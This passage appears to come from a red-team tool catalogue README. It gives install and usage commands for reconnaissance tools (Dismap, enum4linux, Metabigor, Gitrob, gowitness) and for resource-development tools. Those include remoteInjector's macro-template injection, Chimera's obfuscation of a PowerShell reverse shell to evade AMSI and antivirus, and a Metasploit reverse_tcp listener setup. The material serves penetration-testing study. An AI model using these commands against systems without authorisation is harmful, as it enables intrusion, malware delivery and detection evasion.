1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Dismap is an asset discovery and identification tool. It can quickly identify protocols and fingerprint information such as web/tcp/udp, locate asset types, and is suitable for internal and external networks.</p> <p dir="auto">Dismap has a complete fingerprint rule base, currently including tcp/udp/tls protocol fingerprints and 4500+ web fingerprint rules, which can identify favicon, body, header, etc.</p> <p dir="auto"><strong>Install:</strong></p> <p dir="auto">Dismap is a binary file for Linux, MacOS, and Windows. Go to <a href="https://github.com/zhzyker/dismap/releases">Release</a> to download the corresponding version to run:</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Linux or MacOS chmod +x dismap-0.3-linux-amd64 ./dismap-0.3-linux-amd64 -h # Windows dismap-0.3-windows-amd64.exe -h"><pre><span class="pl-c"><span class="pl-c">#</span> Linux or MacOS</span> chmod +x dismap-0.3-linux-amd64 ./dismap-0.3-linux-amd64 -h <span class="pl-c"><span class="pl-c">#</span> Windows</span> dismap-0.3-windows-amd64.exe -h</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Scan 192.168.1.1 subnet ./dismap -i 192.168.1.1/24 # Scan, output to result.txt and json output to result.json ./dismap -i 192.168.1.1/24 -o result.txt -j result.json # Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds ./dismap -i 192.168.1.1/24 --np --timeout 10 # Scan, Number of concurrent threads 1000 ./dismap -i 192.168.1.1/24 -t 1000"><pre><span class="pl-c"><span class="pl-c">#</span> Scan 192.168.1.1 subnet</span> ./dismap -i 192.168.1.1/24 <span class="pl-c"><span class="pl-c">#</span> Scan, output to result.txt and json output to result.json</span> ./dismap -i 192.168.1.1/24 -o result.txt -j result.json <span class="pl-c"><span class="pl-c">#</span> Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds</span> ./dismap -i 192.168.1.1/24 --np --timeout 10 <span class="pl-c"><span class="pl-c">#</span> Scan, Number of concurrent threads 1000</span> ./dismap -i 192.168.1.1/24 -t 1000</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210266012-ba3fadf8-5021-4690-a6d7-eda78bd5d50a.png"><img src="https://user-images.githubusercontent.com/100603074/210266012-ba3fadf8-5021-4690-a6d7-eda78bd5d50a.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/zhzyker/dismap">https://github.com/zhzyker/dismap</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/CiscoCXSecurity/enum4linux">enum4linux</a></h3><a id="user-content-enum4linux" class="anchor" aria-label="Permalink: 🔙enum4linux" href="#enum4linux"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A tool for enumerating information from Windows and Samba systems.</p> <p dir="auto">It can be used to gather a wide range of information, including:</p> <ul dir="auto"> <li>Domain and domain controller information</li> <li>Local user and group information</li> <li>Shares and share permissions</li> <li>Security policies</li> <li>Active Directory information</li> </ul> <p dir="auto"><strong>Install: (Apt)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo apt install enum4linux"><pre>sudo apt install enum4linux</pre></div> <p dir="auto"><strong>Install: (Git)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/CiscoCXSecurity/enum4linux cd enum4linux"><pre>git clone https://github.com/CiscoCXSecurity/enum4linux <span class="pl-c1">cd</span> enum4linux</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# 'Do everything' enum4linux.pl -a 192.168.2.55 # Obtain list of usernames (RestrictAnonymous = 0) enum4linux.pl -U 192.168.2.55 # Obtain list of usernames (using authentication) enum4linux.pl -u administrator -p password -U 192.168.2.55 # Get a list of groups and their members enum4linux.pl -G 192.168.2.55 # Verbose scan enum4linux.pl -v 192.168.2.55"><pre><span class="pl-c"><span class="pl-c">#</span> 'Do everything'</span> enum4linux.pl -a 192.168.2.55 <span class="pl-c"><span class="pl-c">#</span> Obtain list of usernames (RestrictAnonymous = 0)</span> enum4linux.pl -U 192.168.2.55 <span class="pl-c"><span class="pl-c">#</span> Obtain list of usernames (using authentication)</span> enum4linux.pl -u administrator -p password -U 192.168.2.55 <span class="pl-c"><span class="pl-c">#</span> Get a list of groups and their members</span> enum4linux.pl -G 192.168.2.55 <span class="pl-c"><span class="pl-c">#</span> Verbose scan </span> enum4linux.pl -v 192.168.2.55</pre></div> <p dir="auto">Full usage information can be found in this <a href="https://labs.portcullis.co.uk/tools/enum4linux/" rel="nofollow">blog</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210266058-bf05f272-ff05-4e97-97e9-5d11b7ae01eb.png"><img src="https://user-images.githubusercontent.com/100603074/210266058-bf05f272-ff05-4e97-97e9-5d11b7ae01eb.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/" rel="nofollow">https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/Esc4iCEscEsc/skanuvaty">skanuvaty</a></h3><a id="user-content-skanuvaty" class="anchor" aria-label="Permalink: 🔙skanuvaty" href="#skanuvaty"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Dangerously fast dns/network/port scanner, created by <a href="https://github.com/Esc4iCEscEsc">Esc4iCEscEsc</a>, written in rust.</p> <p dir="auto">You will need a subdomains file. <em>E.g. <a href="https://raw.githubusercontent.com/aboul3la/Sublist3r/master/subbrute/names.txt" rel="nofollow">Subdomain wordlist by Sublist3r</a></em>.</p> <p dir="auto"><strong>Install:</strong></p> <p dir="auto">Download the latest release from <a href="https://github.com/Esc4iCEscEsc/skanuvaty/releases">here</a>.</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Install a wordlist sudo apt install wordlists ls /usr/share/dirb/wordlists ls /usr/share/amass/wordlists"><pre><span class="pl-c"><span class="pl-c">#</span> Install a wordlist</span> sudo apt install wordlists ls /usr/share/dirb/wordlists ls /usr/share/amass/wordlists</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt"><pre>skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210856146-42a4015c-f34b-4dc6-9e9b-cbeb4a43a964.png"><img src="https://user-images.githubusercontent.com/100603074/210856146-42a4015c-f34b-4dc6-9e9b-cbeb4a43a964.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/Esc4iCEscEsc/skanuvaty">https://github.com/Esc4iCEscEsc/skanuvaty</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/j3ssie/metabigor">Metabigor</a></h3><a id="user-content-metabigor" class="anchor" aria-label="Permalink: 🔙Metabigor" href="#metabigor"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Metabigor is Intelligence tool, its goal is to do OSINT tasks and more but without any API key.</p> <p dir="auto"><strong>Main Features:</strong></p> <ul dir="auto"> <li>Searching information about IP Address, ASN and Organization.</li> <li>Wrapper for running rustscan, masscan and nmap more efficient on IP/CIDR.</li> <li>Finding more related domains of the target by applying various techniques (certificate, whois, Google Analytics, etc).</li> <li>Get Summary about IP address (powered by <a href="https://github.com/theblackturtle">@thebl4ckturtle</a>)</li> </ul> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="go install github.com/j3ssie/metabigor@latest"><pre>go install github.com/j3ssie/metabigor@latest</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# discovery IP of a company/organization echo "company" | metabigor net --org -o /tmp/result.txt # Getting more related domains by searching for certificate info echo 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is old command # Only run rustscan with full ports echo '1.2.3.4/24' | metabigor scan -o result.txt # Reverse Whois to find related domains echo 'example.com' | metabigor related -s 'whois' # Get Google Analytics ID directly from the URL echo 'https://example.com' | metabigor related -s 'google-analytic'"><pre><span class="pl-c"><span class="pl-c">#</span> discovery IP of a company/organization</span> <span class="pl-c1">echo</span> <span class="pl-s"><span class="pl-pds">"</span>company<span class="pl-pds">"</span></span> <span class="pl-k">|</span> metabigor net --org -o /tmp/result.txt <span class="pl-c"><span class="pl-c">#</span> Getting more related domains by searching for certificate info</span> <span class="pl-c1">echo</span> <span class="pl-s"><span class="pl-pds">'</span>Target Inc<span class="pl-pds">'</span></span> <span class="pl-k">|</span> metabigor cert --json <span class="pl-k">|</span> jq -r <span class="pl-s"><span class="pl-pds">'</span>.Domain<span class="pl-pds">'</span></span> <span class="pl-k">|</span> unfurl format %r.%t <span class="pl-k">|</span> sort -u <span class="pl-c"><span class="pl-c">#</span> this is old command</span> <span class="pl-c"><span class="pl-c">#</span> Only run rustscan with full ports</span> <span class="pl-c1">echo</span> <span class="pl-s"><span class="pl-pds">'</span>1.2.3.4/24<span class="pl-pds">'</span></span> <span class="pl-k">|</span> metabigor scan -o result.txt <span class="pl-c"><span class="pl-c">#</span> Reverse Whois to find related domains</span> <span class="pl-c1">echo</span> <span class="pl-s"><span class="pl-pds">'</span>example.com<span class="pl-pds">'</span></span> <span class="pl-k">|</span> metabigor related -s <span class="pl-s"><span class="pl-pds">'</span>whois<span class="pl-pds">'</span></span> <span class="pl-c"><span class="pl-c">#</span> Get Google Analytics ID directly from the URL</span> <span class="pl-c1">echo</span> <span class="pl-s"><span class="pl-pds">'</span>https://example.com<span class="pl-pds">'</span></span> <span class="pl-k">|</span> metabigor related -s <span class="pl-s"><span class="pl-pds">'</span>google-analytic<span class="pl-pds">'</span></span></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210982590-44d58bfc-3b1b-4e11-b8f3-58c5a517626d.png"><img src="https://user-images.githubusercontent.com/100603074/210982590-44d58bfc-3b1b-4e11-b8f3-58c5a517626d.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/j3ssie/metabigor">https://github.com/j3ssie/metabigor</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/michenriksen/gitrob">Gitrob</a></h3><a id="user-content-gitrob" class="anchor" aria-label="Permalink: 🔙Gitrob" href="#gitrob"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github.</p> <p dir="auto">Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files.</p> <p dir="auto">The findings will be presented through a web interface for easy browsing and analysis.</p> <p dir="auto"><strong>Note:</strong> <em>Gitrob will need a Github access token in order to interact with the Github API. <a href="https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/">Create a personal access token</a> and save it in an environment variable in your .bashrc or similar shell configuration file:</em></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef"><pre><span class="pl-k">export</span> GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef</pre></div> <p dir="auto"><strong>Install: (Go)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="go get github.com/michenriksen/gitrob"><pre>go get github.com/michenriksen/gitrob</pre></div> <p dir="auto"><strong>Install: (Binary)</strong></p> <p dir="auto">A <a href="https://github.com/michenriksen/gitrob/releases">precompiled version</a> is available for each release.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Run against org gitrob {org_name} # Saving session to a file gitrob -save ~/gitrob-session.json acmecorp # Loading session from a file gitrob -load ~/gitrob-session.json"><pre><span class="pl-c"><span class="pl-c">#</span> Run against org</span> gitrob {org_name} <span class="pl-c"><span class="pl-c">#</span> Saving session to a file</span> gitrob -save <span class="pl-k">~</span>/gitrob-session.json acmecorp <span class="pl-c"><span class="pl-c">#</span> Loading session from a file</span> gitrob -load <span class="pl-k">~</span>/gitrob-session.json</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210982754-fb70db8f-0e0f-4c31-962f-ac89edc7e64a.png"><img src="https://user-images.githubusercontent.com/100603074/210982754-fb70db8f-0e0f-4c31-962f-ac89edc7e64a.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://www.uedbox.com/post/58828/" rel="nofollow">https://www.uedbox.com/post/58828/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/sensepost/gowitness">gowitness</a></h3><a id="user-content-gowitness" class="anchor" aria-label="Permalink: 🔙gowitness" href="#gowitness"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Gowitness is a website screenshot utility written in Golang, that uses Chrome Headless to generate screenshots of web interfaces using the command line, with a handy report viewer to process results. Both Linux and macOS is supported, with Windows support mostly working.</p> <p dir="auto"><strong>Install: (Go)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="go install github.com/sensepost/gowitness@latest"><pre>go install github.com/sensepost/gowitness@latest</pre></div> <p dir="auto">Full installation information can be found <a href="https://github.com/sensepost/gowitness/wiki/Installation">here</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Screenshot a single website gowitness single https://www.google.com/ # Screenshot a cidr using 20 threads gowitness scan --cidr 192.168.0.0/24 --threads 20 # Screenshot open http services from an namp file gowitness nmap -f nmap.xml --open --service-contains http # Run the report server gowitness report serve"><pre><span class="pl-c"><span class="pl-c">#</span> Screenshot a single website</span> gowitness single https://www.google.com/ <span class="pl-c"><span class="pl-c">#</span> Screenshot a cidr using 20 threads</span> gowitness scan --cidr 192.168.0.0/24 --threads 20 <span class="pl-c"><span class="pl-c">#</span> Screenshot open http services from an namp file</span> gowitness nmap -f nmap.xml --open --service-contains http <span class="pl-c"><span class="pl-c">#</span> Run the report server</span> gowitness report serve</pre></div> <p dir="auto">Full usage information can be found <a href="https://github.com/sensepost/gowitness/wiki/Usage">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/212204666-d7dcac1b-0f1a-46b8-8938-d2e122c1436c.png"><img src="https://user-images.githubusercontent.com/100603074/212204666-d7dcac1b-0f1a-46b8-8938-d2e122c1436c.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/sensepost/gowitness">https://github.com/sensepost/gowitness</a></em></p> <div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">Resource Development</h1><a id="user-content-resource-development" class="anchor" aria-label="Permalink: Resource Development" href="#resource-development"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/JohnWoodman/remoteinjector">remoteInjector</a></h3><a id="user-content-remoteinjector" class="anchor" aria-label="Permalink: 🔙remoteInjector" href="#remoteinjector"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Injects link to remote word template into word document.</p> <p dir="auto">This Python-based utility modifies a .docx file’s settings.xml.rels link to a remote hosted .dotm template containing a VBA macro, executing when the document is opened and macros are enabled.</p> <p dir="auto"><a href="https://john-woodman.com/research/vba-macro-remote-template-injection/" rel="nofollow">Related Blog Post</a></p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/JohnWoodman/remoteinjector;cd remoteinjector"><pre>git clone https://github.com/JohnWoodman/remoteinjector<span class="pl-k">;</span><span class="pl-c1">cd</span> remoteinjector</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="python3 remoteinjector.py -w https://example.com/template.dotm example.docx"><pre>python3 remoteinjector.py -w https://example.com/template.dotm example.docx</pre></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/tokyoneon/Chimera">Chimera</a></h3><a id="user-content-chimera" class="anchor" aria-label="Permalink: 🔙Chimera" href="#chimera"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Chimera is a PowerShell obfuscation script designed to bypass AMSI and antivirus solutions. It digests malicious PS1's known to trigger AV and uses string substitution and variable concatenation to evade common detection signatures.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git sudo git clone https://github.com/tokyoneon/chimera /opt/chimera sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/ sudo chmod +x chimera.sh; ./chimera.sh --help"><pre>sudo apt-get update <span class="pl-k">&&</span> sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git sudo git clone https://github.com/tokyoneon/chimera /opt/chimera sudo chown <span class="pl-smi">$USER</span>:<span class="pl-smi">$USER</span> -R /opt/chimera/<span class="pl-k">;</span> <span class="pl-c1">cd</span> /opt/chimera/ sudo chmod +x chimera.sh<span class="pl-k">;</span> ./chimera.sh --help</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\ copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\ invoke-expression,out-string,write-error -j -g -k -r -p"><pre>./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\ copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\ invoke-expression,out-string,write-error -j -g -k -r -p</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/209867736-5c35cec0-9227-4f18-a439-a5c954342818.png"><img src="https://user-images.githubusercontent.com/100603074/209867736-5c35cec0-9227-4f18-a439-a5c954342818.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://www.offensive-security.com/metasploit-unleashed/Msfvenom/" rel="nofollow">msfvenom</a></h3><a id="user-content-msfvenom" class="anchor" aria-label="Permalink: 🔙msfvenom" href="#msfvenom"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Msfvenom allows the creation of payloads for various operating systems in a wide range of formats. It also supports obfuscation of payloads for AV bypass.</p> <p dir="auto"><strong>Set Up Listener</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your-ip set LPORT listening-port run"><pre>use exploit/multi/handler <span class="pl-c1">set</span> PAYLOAD windows/meterpreter/reverse_tcp <span class="pl-c1">set</span> LHOST your-ip <span class="pl-c1">set</span> LPORT listening-port run</pre></div> <div class="markdown-heading" dir="auto"><h4 tabindex="-1" class="heading-element" dir="auto">Msfvenom Commands</h4><a id="user-content-msfvenom-commands" class="anchor" aria-label="Permalink: Msfvenom Commands" href="#msfvenom-commands"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 